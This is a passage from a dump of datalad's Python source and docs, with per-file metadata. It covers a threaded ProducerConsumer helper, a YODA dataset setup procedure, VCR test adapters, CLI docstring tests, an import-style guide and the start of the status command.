scope\".\n\n Notes\n -----\n - with jobs > 1, results are yielded as soon as available, so order\n might not match the one provided by \"producer\".\n - jobs > 1, is \"effective\" only for Python >= 3.8. For older versions it\n would log a warning (upon initial encounter) if jobs > 1 is specified.\n - `producer` must produce unique entries. AssertionError might be raised if\n the same entry is to be consumed.\n - `consumer` can add to the queue of items produced by producer via\n `.add_to_producer_queue`. This allows for continuous re-use of the same\n instance in recursive operations (see `get` use of ProducerConsumer).\n - if producer or consumer raise an exception, we will try to \"fail gracefully\",\n unless subsequent Ctrl-C is pressed, we will let already running jobs to\n finish first.\n\n Examples\n --------\n A simple and somewhat boring example could be to count lines in '*.py'\n files in parallel\n\n from glob import glob\n from pprint import pprint\n from datalad.support.parallel import ProducerConsumer\n\n def count_lines(fname):\n with open(fname) as f:\n return fname, len(f.readlines())\n pprint(dict(ProducerConsumer(glob(\"*.py\"), count_lines)))\n\n More usage examples could be found in `test_parallel.py` and around the\n codebase `addurls.py`, `get.py`, `save.py`, etc.\n \"\"\"\n\n # Users should not specify -J100 and then just come complaining without\n # being informed that they are out of luck\n _alerted_already = False\n\n def __init__(self,\n producer, consumer,\n *,\n jobs=None,\n safe_to_consume=None,\n producer_future_key=None,\n reraise_immediately=False,\n agg=None,\n ):\n \"\"\"\n\n Parameters\n ----------\n producer: iterable\n Provides items to feed a consumer with\n consumer: callable\n Is provided with items produced by producer. Multiple consumers might\n operate in parallel threads if jobs > 1\n jobs: int, optional\n If None or \"auto\", 'datalad.runtime.max-jobs' configuration variable is\n consulted. With jobs=0 there is no threaded execution whatsoever. 
With\n jobs=1 there is a separate thread for the producer, so in effect with jobs=1\n some parallelization between producer (if it is a generator) and consumer\n could be achieved, while there is only a single thread available for consumers.\n safe_to_consume: callable, optional\n A callable which gets a dict of all known futures and current item from producer.\n It should return `True` if executor can proceed with current value from producer.\n If not (unsafe to consume) - we will wait.\n WARNING: outside code should make sure about provider and `safe_to_consume` to\n play nicely or a very suboptimal behavior or possibly even a deadlock can happen.\n producer_future_key: callable, optional\n A key function for a value from producer which will be used as a key in futures\n dictionary and output of which is passed to safe_to_consume.\n reraise_immediately: bool, optional\n If True, it would stop producer yielding values as soon as it detects that some\n exception has occurred (although there might still be values in the queue to be yielded\n which were collected before the exception was raised).\n agg: callable, optional\n Should be a callable with two arguments: (item, prior total) and return a new total\n which will get assigned to .total of this object. If not specified, .total is\n just a number of items produced by the producer.\n \"\"\"\n self.producer = producer\n self.consumer = consumer\n self.jobs = jobs\n self.safe_to_consume = safe_to_consume\n self.producer_future_key = producer_future_key\n self.reraise_immediately = reraise_immediately\n self.agg = agg\n\n self.total = None if self.agg else 0\n self._jobs = None # actual \"parallel\" jobs used\n # Relevant only for _iter_threads\n self._producer_finished = None\n self._producer_queue = None\n self._producer_exception = None\n self._producer_interrupt = None\n # so we could interrupt more or less gracefully\n self._producer_thread = None\n self._executor = None\n self._futures = {}\n self._interrupted = False\n\n @property\n def interrupted(self):\n return self._interrupted\n\n def __del__(self):\n # if we are killed while executing, we should ask executor to shutdown\n shutdown = getattr(self, \"shutdown\", None)\n if shutdown:\n shutdown(force=True)\n\n def shutdown(self, force=False, exception=None):\n if self._producer_thread and self._producer_thread.is_alive():\n # we will try to let the worker to finish \"gracefully\"\n self._producer_interrupt = f\"shutdown due to {exception}\"\n\n # purge producer queue\n if self._producer_queue:\n while not self._producer_queue.empty():\n self._producer_queue.get()\n\n lgr.debug(\"Shutting down %s with %d futures. Reason: %s\",\n self._executor, len(self._futures), exception)\n\n if not force:\n # pop not yet running or done futures.\n # Those would still have a chance to yield results and finish gracefully\n # or their exceptions to be bubbled up FWIW.\n ntotal = len(self._futures)\n ncanceled = 0\n nrunning = 0\n # Do in reverse order so if any job still manages\n # to sneak in, it would be the earlier submitted one.\n for k, future in list(self._futures.items())[::-1]:\n running = future.running()\n nrunning += int(running)\n if not (running or future.done()):\n if self._futures.pop(k).cancel():\n ncanceled += 1\n lgr.info(\"Canceled %d out of %d jobs. 
%d left running.\",\n ncanceled, ntotal, nrunning)\n else:\n # just pop all entirely\n for k in list(self._futures)[::-1]:\n self._futures.pop(k).cancel()\n if self._executor:\n self._executor.shutdown()\n self._executor = None\n if exception:\n raise exception\n lgr.debug(\"Finished shutdown with force=%s due to exception=%r\", force, exception)\n\n def _update_total(self, value):\n if self.agg:\n self.total = (\n self.agg(value, self.total) if self.total is not None else self.agg(value)\n )\n else:\n self.total += 1\n\n @classmethod\n def get_effective_jobs(cls, jobs):\n \"\"\"Return actual number of jobs to be used.\n\n It will account for configuration variable ('datalad.runtime.max-jobs') and possible\n other requirements (such as version of Python).\n \"\"\"\n if jobs in (None, \"auto\"):\n from datalad import cfg\n # ATM there is no \"auto\" for this operation, so in both auto and None\n # just consult max-jobs which can only be an int ATM.\n # \"auto\" could be for some auto-scaling based on a single future time\n # to complete, scaling up/down. Ten config variable could accept \"auto\" as well\n jobs = cfg.obtain('datalad.runtime.max-jobs')\n return jobs\n\n def __iter__(self):\n self._jobs = self.get_effective_jobs(self.jobs)\n if self._jobs == 0:\n yield from self._iter_serial()\n else:\n yield from self._iter_threads(self._jobs)\n\n def _iter_serial(self):\n # depchecker is not consulted, serial execution\n # reraise_immediately is also \"always False by design\"\n # To allow consumer to add to the queue\n self._producer_queue = producer_queue = Queue()\n\n def produce():\n # First consume all coming directly from producer and then go through all which\n # consumer might have added to the producer queue\n for args in self._producer_iter:\n self._update_total(args)\n yield args\n # consumer could have added to the queue while we were still\n # producing\n while not producer_queue.empty():\n yield producer_queue.get()\n\n for args in produce():\n res = self.consumer(args)\n if inspect.isgenerator(res):\n lgr.debug(\"Got consumer worker which returned a generator %s\", res)\n yield from res\n else:\n lgr.debug(\"Got straight result %s, not a generator\", res)\n yield res\n\n @property\n def _producer_iter(self):\n \"\"\"A little helper to also support generator functions\"\"\"\n return self.producer() if inspect.isgeneratorfunction(self.producer) else self.producer\n\n def _iter_threads(self, jobs):\n self._interrupted = False\n self._producer_finished = False\n self._producer_exception = None\n self._producer_interrupt = None\n\n # To allow feeding producer queue with more entries, possibly from consumer!\n self._producer_queue = producer_queue = Queue()\n consumer_queue = Queue()\n\n def producer_worker():\n \"\"\"That is the one which interrogates producer and updates .total\"\"\"\n try:\n for value in self._producer_iter:\n if self._producer_interrupt:\n raise InterruptedError(\"Producer thread was interrupted due to %s\" % self._producer_interrupt)\n self.add_to_producer_queue(value)\n except InterruptedError:\n pass # There is some outside exception which will be raised\n except BaseException as e:\n self._producer_exception = e\n finally:\n self._producer_finished = True\n\n def consumer_worker(callable, *args, **kwargs):\n \"\"\"Since jobs could return a generator and we cannot really \"inspect\" for that\n \"\"\"\n res = callable(*args, **kwargs)\n if inspect.isgenerator(res):\n lgr.debug(\"Got consumer worker which returned a generator %s\", res)\n didgood = False\n for 
r in res:\n didgood = True\n lgr.debug(\"Adding %s to queue\", r)\n consumer_queue.put(r)\n if not didgood:\n lgr.error(\"Nothing was obtained from %s :-(\", res)\n else:\n lgr.debug(\"Got straight result %s, not a generator\", res)\n consumer_queue.put(res)\n\n self._producer_thread = Thread(target=producer_worker)\n self._producer_thread.start()\n self._futures = futures = {}\n\n lgr.debug(\"Initiating ThreadPoolExecutor with %d jobs\", jobs)\n # we will increase sleep_time when doing nothing useful\n sleeper = Sleeper()\n interrupted_by_exception = None\n with concurrent.futures.ThreadPoolExecutor(jobs) as executor:\n self._executor = executor\n # yield from the producer_queue (.total and .finished could be accessed meanwhile)\n while True:\n try:\n done_useful = False\n if self.reraise_immediately and self._producer_exception and not interrupted_by_exception:\n # so we have a chance to exit gracefully\n # No point to reraise if there is already an exception which was raised\n # which might have even been this one\n lgr.debug(\"Reraising an exception from producer as soon as we found it\")\n raise self._producer_exception\n if (self._producer_finished and\n not futures and\n consumer_queue.empty() and\n producer_queue.empty()):\n # This will let us not \"escape\" the while loop and reraise any possible exception\n # within the loop if we have any.\n # Otherwise we might see \"RuntimeError: generator ignored GeneratorExit\"\n # when e.g. we did continue upon interrupted_by_exception, and then\n # no other subsequent exception was raised and we left the loop\n raise _FinalShutdown()\n\n # important! We are using threads, so worker threads will be sharing CPU time\n # with this master thread. For it to become efficient, we should consume as much\n # as possible from producer asap and push it to executor. So drain the queue\n while not (producer_queue.empty() or interrupted_by_exception):\n done_useful = True\n try:\n job_args = producer_queue.get() # timeout=0.001)\n job_key = self.producer_future_key(job_args) if self.producer_future_key else job_args\n if self.safe_to_consume:\n # Sleep a little if we are not yet ready\n # TODO: add some .debug level reporting based on elapsed time\n # IIRC I did smth like growing exponentially delays somewhere (dandi?)\n while not self.safe_to_consume(futures, job_key):\n self._pop_done_futures(lgr) or sleeper()\n # Current implementation, to provide depchecking, relies on unique\n # args for the job\n assert job_key not in futures\n lgr.debug(\"Submitting worker future for %s\", job_args)\n futures[job_key] = executor.submit(consumer_worker, self.consumer, job_args)\n except Empty:\n pass\n\n # check active futures\n if not consumer_queue.empty():\n done_useful = True\n # ATM we do not bother of some \"in order\" reporting\n # Just report as soon as any new record arrives\n res = consumer_queue.get()\n lgr.debug(\"Got %s from consumer_queue\", res)\n yield res\n\n done_useful |= self._pop_done_futures(lgr)\n\n if not done_useful: # you need some rest\n # TODO: same here -- progressive logging\n lgr.log(5,\n \"Did nothing useful, sleeping. 
Have \"\n \"producer_finished=%s producer_queue.empty=%s futures=%s consumer_queue.empty=%s\",\n self._producer_finished,\n producer_queue.empty(),\n futures,\n consumer_queue.empty(),\n )\n sleeper()\n else:\n sleeper.reset()\n except (_FinalShutdown, GeneratorExit):\n self.shutdown(force=True, exception=self._producer_exception or interrupted_by_exception)\n break # if there were no exception to raise\n except BaseException as exc:\n ce = CapturedException(exc)\n self._interrupted = True\n if interrupted_by_exception:\n # so we are here again but now it depends why we are here\n if isinstance(exc, KeyboardInterrupt):\n lgr.warning(\"Interrupted via Ctrl-C. Forcing the exit\")\n self.shutdown(force=True, exception=exc)\n else:\n lgr.warning(\n \"One more exception was received while \"\n \"trying to finish gracefully: %s\",\n ce)\n # and we go back into the loop until we finish or there is Ctrl-C\n else:\n interrupted_by_exception = exc\n lgr.warning(\n \"Received an exception %s. Canceling not-yet \"\n \"running jobs and waiting for completion of \"\n \"running. You can force earlier forceful exit \"\n \"by Ctrl-C.\", ce)\n self.shutdown(force=False, exception=exc)\n\n def add_to_producer_queue(self, value):\n self._producer_queue.put(value)\n self._update_total(value)\n\n def _pop_done_futures(self, lgr):\n \"\"\"Removes .done from provided futures.\n\n Returns\n -------\n bool\n True if any future was removed\n \"\"\"\n done_useful = False\n # remove futures which are done\n for args, future in list(self._futures.items()):\n if future.done():\n done_useful = True\n future_ = self._futures.pop(args)\n exception = future_.exception()\n if exception:\n lgr.debug(\"Future for %r raised %s. Re-raising to trigger graceful shutdown etc\", args, exception)\n raise exception\n lgr.debug(\"Future for %r is done\", args)\n return done_useful\n\n\nclass Sleeper():\n def __init__(self):\n self.min_sleep_time = 0.001\n # but no more than to this max\n self.max_sleep_time = 0.1\n self.sleep_time = self.min_sleep_time\n\n def __call__(self):\n time.sleep(self.sleep_time)\n self.sleep_time = min(self.max_sleep_time, self.sleep_time * 2)\n\n def reset(self):\n self.sleep_time = self.min_sleep_time\n\n\nclass ProducerConsumerProgressLog(ProducerConsumer):\n \"\"\"ProducerConsumer wrapper with log_progress reporting.\n\n It is to be used around a `consumer` which returns or yields result records.\n If that is not the case -- use regular `ProducerConsumer`.\n\n It will update `.total` of the `log_progress` each time it changes (i.e. whenever\n producer produced new values to be consumed).\n \"\"\"\n\n def __init__(self,\n producer, consumer,\n *,\n log_filter=None,\n label=\"Total\", unit=\"items\",\n lgr=None,\n **kwargs\n ):\n \"\"\"\n Parameters\n ----------\n producer, consumer, **kwargs\n Passed into ProducerConsumer. Most likely kwargs must not include 'agg' or\n if provided, it must return an 'int' value.\n log_filter: callable, optional\n If defined, only result records for which callable evaluates to True will be\n passed to log_progress\n label, unit: str, optional\n Provided to log_progress\n lgr: logger, optional\n Provided to log_progress. 
Local one is used if not provided\n \"\"\"\n super().__init__(producer, consumer, **kwargs)\n self.log_filter = log_filter\n self.label = label\n self.unit = unit\n self.lgr = lgr\n\n def __iter__(self):\n pid = str(uuid.uuid4()) # could be based on PID and time may be to be informative?\n lgr_ = self.lgr\n label = self.label\n if lgr_ is None:\n lgr_ = lgr\n\n log_progress(lgr_.info, pid,\n \"%s: starting\", self.label,\n # will become known only later total=len(items),\n label=self.label, unit=\" \" + self.unit,\n noninteractive_level=5)\n counts = defaultdict(int)\n total_announced = None # self.total\n for res in super().__iter__():\n if self.total and total_announced != self.total:\n # update total with new information\n log_progress(\n lgr_.info,\n pid,\n \"\", # None flips python 3.6.7 in conda if nose ran without -s\n # I do not think there is something\n # valuable to announce\n total=self.total,\n # unfortunately of no effect, so we cannot inform that more items to come\n # unit=(\"+\" if not it.finished else \"\") + \" \" + unit,\n update=0, # not None, so it does not stop\n noninteractive_level=5\n )\n total_announced = self.total\n\n if not (self.log_filter and not self.log_filter(res)):\n counts[res[\"status\"]] += 1\n count_strs = [_count_str(*args)\n for args in [(counts[\"notneeded\"], \"skipped\", False),\n (counts[\"error\"], \"failed\", True)]]\n if counts[\"notneeded\"] or counts[\"error\"] or self.interrupted:\n strs = count_strs\n if self.interrupted:\n strs.append(\"exiting!\")\n label = \"{} ({})\".format(\n self.label,\n \", \".join(filter(None, count_strs)))\n\n log_progress(\n lgr_.error if res[\"status\"] == \"error\" else lgr_.info,\n pid,\n \"%s: processed result%s\", self.label,\n \" for \" + res[\"path\"] if \"path\" in res else \"\",\n label=label, update=1, increment=True,\n noninteractive_level=5)\n yield res\n log_progress(lgr_.info, pid, \"%s: done\", self.label,\n noninteractive_level=5)\n\n\nclass _FinalShutdown(Exception):\n \"\"\"Used internally for the final forceful shutdown if any exception did happen\"\"\"\n pass\n" }, { "alpha_fraction": 0.6309260129928589, "alphanum_fraction": 0.6318121552467346, "avg_line_length": 23.532608032226562, "blob_id": "453a5e8541a8847f5c42965a094ea7d8bc41d975", "content_id": "19fd5e48366336e9b20d739a1a84509d73ea9342", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2257, "license_type": "permissive", "max_line_length": 76, "num_lines": 92, "path": "/datalad/resources/procedures/cfg_yoda.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\"\"\"Procedure to apply YODA-compatible default setup to a dataset\n\nThis procedure assumes a clean dataset that was just created by\n`datalad create`.\n\"\"\"\n\nimport sys\nimport os.path as op\n\nfrom datalad.distribution.dataset import require_dataset\nfrom datalad.utils import create_tree\n\nds = require_dataset(\n sys.argv[1],\n check_installed=True,\n purpose='YODA dataset setup')\n\nto_modify = [\n ds.pathobj / 'code' / 'README.md',\n ds.pathobj / 'code' / '.gitattributes',\n ds.pathobj / 'README.md',\n ds.pathobj / 'CHANGELOG.md',\n ds.pathobj / '.gitattributes',\n]\n\ndirty = [\n s for s in ds.status(\n to_modify,\n result_renderer='disabled',\n return_type='generator',\n )\n if s['state'] != 'clean'\n]\n\nif dirty:\n raise RuntimeError(\n 'Stopping, because to be modified dataset '\n 'content was found dirty: {}'.format(\n [s['path'] for s in 
dirty]\n ))\n\nREADME_code = \"\"\"\\\nAll custom code goes into this directory. All scripts should be written such\nthat they can be executed from the root of the dataset, and are only using\nrelative paths for portability.\n\"\"\"\n\nREADME_top = \"\"\"\\\n# Project <insert name>\n\n## Dataset structure\n\n- All inputs (i.e. building blocks from other sources) are located in\n `inputs/`.\n- All custom code is located in `code/`.\n\"\"\"\n\ntmpl = {\n 'code': {\n 'README.md': README_code,\n },\n 'README.md': README_top,\n 'CHANGELOG.md': '', # TODO\n}\n\n# unless taken care of by the template already, each item in here\n# will get its own .gitattributes entry to keep it out of the annex\n# give relative path to dataset root (use platform notation)\nforce_in_git = [\n 'README.md',\n 'CHANGELOG.md',\n]\n\n###################################################################\n# actually dump everything into the dataset\ncreate_tree(ds.path, tmpl)\n\n# all code goes into Git\nds.repo.set_gitattributes([('*', {'annex.largefiles': 'nothing'})],\n op.join('code', '.gitattributes'))\n\n# amend gitattributes\nds.repo.set_gitattributes(\n [(p, {'annex.largefiles': 'nothing'}) for p in force_in_git])\n\n# leave clean\nds.save(\n path=to_modify,\n message=\"Apply YODA dataset setup\",\n result_renderer='disabled'\n)\n" }, { "alpha_fraction": 0.6114524602890015, "alphanum_fraction": 0.6146473288536072, "avg_line_length": 37.75238037109375, "blob_id": "94c583a1ff38f3631f6512d0d493fb820ed210cc", "content_id": "129d833c5a8290ca5fe037f0abdccada9d5394f7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4069, "license_type": "permissive", "max_line_length": 112, "num_lines": 105, "path": "/datalad/support/vcr_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Adapters and decorators for vcr\n\"\"\"\n\nimport logging\n\nfrom functools import wraps\nfrom os.path import isabs\nfrom contextlib import contextmanager\n\nfrom datalad.utils import Path\nfrom datalad.support.exceptions import CapturedException\n\nlgr = logging.getLogger(\"datalad.support.vcr\")\n\n\ndef _get_cassette_path(path):\n \"\"\"Return a path to the cassette within our unified 'storage'\"\"\"\n if not isabs(path): # so it was given as a name\n return \"fixtures/vcr_cassettes/%s.yaml\" % path\n return path\n\ntry:\n # TEMP: Just to overcome problem with testing on jessie with older requests\n # https://github.com/kevin1024/vcrpy/issues/215\n import vcr.patch as _vcrp\n import requests as _\n try:\n from requests.packages.urllib3.connectionpool import HTTPConnection as _a, VerifiedHTTPSConnection as _b\n except ImportError:\n def returnnothing(*args, **kwargs):\n return()\n _vcrp.CassettePatcherBuilder._requests = returnnothing\n\n from vcr import use_cassette as _use_cassette, VCR as _VCR\n\n def use_cassette(path, return_body=None, skip_if_no_vcr=False, **kwargs):\n \"\"\"Adapter so we could create/use custom use_cassette with custom parameters\n\n Parameters\n ----------\n path : str\n If not absolute path, treated as a name for a cassette under 
fixtures/vcr_cassettes/\n skip_if_no_vcr : bool\n Rather than running without VCR it would throw unittest.SkipTest\n exception. Of effect only if vcr import fails (so not in this\n implementation but the one below)\n \"\"\"\n path = _get_cassette_path(path)\n lgr.debug(\"Using cassette %s\", path)\n if return_body is not None:\n my_vcr = _VCR(\n before_record_response=lambda r: dict(r, body={'string': return_body.encode()}))\n return my_vcr.use_cassette(path, **kwargs) # with a custom response\n else:\n return _use_cassette(path, **kwargs) # just a straight one\n\n # shush vcr\n vcr_lgr = logging.getLogger('vcr')\n if lgr.getEffectiveLevel() > logging.DEBUG:\n vcr_lgr.setLevel(logging.WARN)\nexcept Exception as exc:\n if not isinstance(exc, ImportError):\n # something else went hairy (e.g. vcr failed to import boto due to some syntax error)\n lgr.warning(\"Failed to import vcr, no cassettes will be available: %s\",\n CapturedException(exc))\n # If there is no vcr.py -- provide a do nothing decorator for use_cassette\n\n def use_cassette(path, return_body=None, skip_if_no_vcr=False, **kwargs):\n if skip_if_no_vcr:\n def skip_decorator(t):\n @wraps(t)\n def wrapper(*args, **kwargs):\n from unittest import SkipTest\n raise SkipTest(\"No vcr\")\n return wrapper\n return skip_decorator\n else:\n def do_nothing_decorator(t):\n @wraps(t)\n def wrapper(*args, **kwargs):\n lgr.debug(\"Not using vcr cassette\")\n return t(*args, **kwargs)\n return wrapper\n return do_nothing_decorator\n\n\n@contextmanager\ndef externals_use_cassette(name):\n \"\"\"Helper to pass instruction via env variables to use specified cassette\n\n For instance whenever we are testing custom special remotes invoked by the annex\n but want to minimize their network traffic by using vcr.py\n \"\"\"\n from unittest.mock import patch\n cassette_path = str(Path(_get_cassette_path(name)).resolve()) # realpath OK\n with patch.dict('os.environ', {'DATALAD_TESTS_USECASSETTE': cassette_path}):\n yield\n" }, { "alpha_fraction": 0.6047579050064087, "alphanum_fraction": 0.605592668056488, "avg_line_length": 29.71794891357422, "blob_id": "bacc0b6a373a8ba3a1544d94294177f25a71a5e9", "content_id": "9a00cbcb268e43900d730df64590431b323d2a7f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2396, "license_type": "permissive", "max_line_length": 73, "num_lines": 78, "path": "/datalad/cli/tests/test_interface.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.interface.tests.test_docs import (\n demo_argdoc,\n demo_doc,\n demo_paramdoc,\n)\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_not_in,\n eq_,\n)\n\nfrom ..interface import (\n alter_interface_docs_for_cmdline,\n get_cmdline_command_name,\n)\n\n\ndef test_alter_interface_docs_for_cmdline():\n alt = alter_interface_docs_for_cmdline(demo_doc)\n alt_l = alt.split('\\n')\n # de-dented\n assert_false(alt_l[0].startswith(' '))\n assert_false(alt_l[-1].startswith(' '))\n assert_not_in('PY', alt)\n assert_not_in('CMD', alt)\n assert_not_in('REFLOW', alt)\n assert_in('a b', alt)\n assert_in('not\\n reflowed', alt)\n assert_in(\"Something for the cmdline only Multiline!\", alt)\n assert_not_in(\"Some Python-only bits\", alt)\n assert_not_in(\"just for Python\", alt)\n assert_in(\"just for the command line\", alt)\n assert_in(\"multiline cli-only with [ brackets\\n[] ]\", alt)\n assert_not_in(\"multiline\\npython-only with [ brackets [] ]\", alt)\n\n # args\n 
altarg = alter_interface_docs_for_cmdline(demo_argdoc)\n # RST role markup\n eq_(alter_interface_docs_for_cmdline(':murks:`me and my buddies`'),\n 'me and my buddies')\n # spread across lines\n eq_(alter_interface_docs_for_cmdline(':term:`Barbara\\nStreisand`'),\n 'Barbara\\nStreisand')\n # multiple on one line\n eq_(alter_interface_docs_for_cmdline(\n ':term:`one` bla bla :term:`two` bla'),\n 'one bla bla two bla')\n\n altpd = alter_interface_docs_for_cmdline(demo_paramdoc)\n assert_not_in(\"PY\", altpd)\n assert_not_in(\"CMD\", altpd)\n assert_not_in('python', altpd)\n assert_not_in(\"python-only with [ some brackets []\", altpd)\n assert_in('in between', altpd)\n assert_in('appended', altpd)\n assert_in('cmdline', altpd)\n assert_in(\"multiline cli-only [\\n brackets included \"\n \"[ can we also have || ?]\", altpd)\n\n\ndef test_name_generation():\n eq_(\n get_cmdline_command_name((\"some.module_something\", \"SomeClass\")),\n \"module-something\")\n eq_(\n get_cmdline_command_name((\n \"some.module_something\",\n \"SomeClass\",\n \"override\")),\n \"override\")\n eq_(\n get_cmdline_command_name((\n \"some.module_something\",\n \"SomeClass\",\n \"override\",\n \"api_ignore\")),\n \"override\")\n" }, { "alpha_fraction": 0.68319171667099, "alphanum_fraction": 0.6888574361801147, "avg_line_length": 26.802631378173828, "blob_id": "efd50c015ca4430e215cc1d3c0e4806f3a096798", "content_id": "02177401d39073d68492a3d0b07ebe9059cc14fd", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2118, "license_type": "permissive", "max_line_length": 195, "num_lines": 76, "path": "/docs/source/design/python_imports.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_python_imports:\n\n************************\nPython import statements\n************************\n\n.. topic:: Specification scope and status\n\n This specification describes the current (albeit incomplete) implementation.\n\nThe following rules apply to any ``import`` statement in the code base:\n\n- All imports *must* be absolute, unless they import individual pieces of an integrated code component that is only split across several source code files for technical or organizational reasons.\n\n- Imports *must* be placed at the top of a source file, unless there is a\n specific reason not to do so (e.g., delayed import due to performance\n concerns, circular dependencies). If such a reason exists, it *must*\n be documented by a comment at the import statement.\n\n- There *must* be no more than one import per line.\n\n- Multiple individual imports from a single module *must* follow the pattern::\n\n from <module> import (\n symbol1,\n symbol2,\n )\n\n Individual imported symbols *should* be sorted alphabetically. The last symbol\n line *should* end with a comma.\n\n- Imports from packages and modules *should* be grouped in categories like\n\n - Standard library packages\n\n - 3rd-party packages\n\n - DataLad core (absolute imports)\n\n - DataLad extensions\n \n - DataLad core (\"local\" relative imports)\n \n Sorting imports can be aided by https://github.com/PyCQA/isort (e.g. 
``python -m isort -m3 --fgw 2 --tc <filename>``).\n\n\n\nExamples\n========\n\n::\n\n from collections import OrderedDict\n import logging\n import os\n\n from datalad.utils import (\n bytes2human,\n ensure_list,\n ensure_unicode,\n get_dataset_root as gdr,\n )\n \n In the `datalad/submodule/tests/test_mod.py` test file demonstrating an \"exception\" to absolute imports\n rule where test files are accompanying corresponding files of the underlying module:: \n \n import os\n \n from datalad.utils import ensure_list\n \n from ..mod import func1\n\n from datalad.tests.utils_pytest import assert_true\n \n" }, { "alpha_fraction": 0.6016497611999512, "alphanum_fraction": 0.6028744578361511, "avg_line_length": 41.255706787109375, "blob_id": "b36712e548fee91528c78284bd1a0fda2dec3bb0", "content_id": "c591880aaa8311d088b059265ea5fdfa464e5588", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27762, "license_type": "permissive", "max_line_length": 94, "num_lines": 657, "path": "/datalad/core/local/status.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Report status of a dataset (hierarchy)'s work tree\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport os.path as op\nfrom collections import OrderedDict\nimport warnings\n\nfrom datalad.utils import (\n bytes2human,\n ensure_list,\n ensure_unicode,\n get_dataset_root,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.common_opts import (\n recursion_limit,\n recursion_flag,\n)\nfrom datalad.interface.utils import generic_result_renderer\nimport datalad.support.ansi_colors as ac\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.distribution.dataset import (\n Dataset,\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n path_under_rev_dataset,\n)\n\nimport datalad.utils as ut\n\nfrom datalad.dochelpers import single_or_plural\n\nlgr = logging.getLogger('datalad.core.local.status')\n\n_common_diffstatus_params = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to query. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n annex=Parameter(\n args=('--annex',),\n # the next two enable a sole `--annex` that auto-translates to\n # `--annex basic`\n const='basic',\n nargs='?',\n constraints=EnsureChoice(None, 'basic', 'availability', 'all'),\n doc=\"\"\"Switch whether to include information on the annex\n content of individual files in the status report, such as\n recorded file size. By default no annex information is reported\n (faster). 
Three report modes are available: basic information\n like file size and key name ('basic'); additionally test whether\n file content is present in the local annex ('availability';\n requires one or two additional file system stat calls, but does\n not call git-annex), this will add the result properties\n 'has_content' (boolean flag) and 'objloc' (absolute path to an\n existing annex object file); or 'all' which will report all\n available information (presently identical to 'availability').\n [CMD: The 'basic' mode will be assumed when this option is given,\n but no mode is specified. CMD]\n \"\"\"),\n untracked=Parameter(\n args=('--untracked',),\n constraints=EnsureChoice('no', 'normal', 'all'),\n doc=\"\"\"If and how untracked content is reported when comparing\n a revision to the state of the working tree. 'no': no untracked\n content is reported; 'normal': untracked files and entire\n untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\"\"\"),\n recursive=recursion_flag,\n recursion_limit=recursion_limit)\n\n\nSTATE_COLOR_MAP = {\n 'untracked': ac.RED,\n 'modified': ac.RED,\n 'deleted': ac.RED,\n 'added': ac.GREEN,\n 'unknown': ac.YELLOW,\n}\n\n\ndef yield_dataset_status(ds, paths, annexinfo, untracked, recursion_limit,\n queried, eval_submodule_state, eval_filetype, cache,\n reporting_order):\n \"\"\"Internal helper to obtain status information on a dataset\n\n Parameters\n ----------\n ds : Dataset\n Dataset to get the status of.\n path : Path-like, optional\n Paths to constrain the status to (see main status() command).\n annexinfo : str\n Annex information reporting mode (see main status() command).\n untracked : str, optional\n Reporting mode for untracked content (see main status() command).\n recursion_limit : int, optional\n queried : set\n Will be populated with a Path instance for each queried dataset.\n eval_submodule_state : str\n Submodule evaluation mode setting for Repo.diffstatus().\n eval_filetype : bool, optional\n THIS OPTION IS IGNORED. 
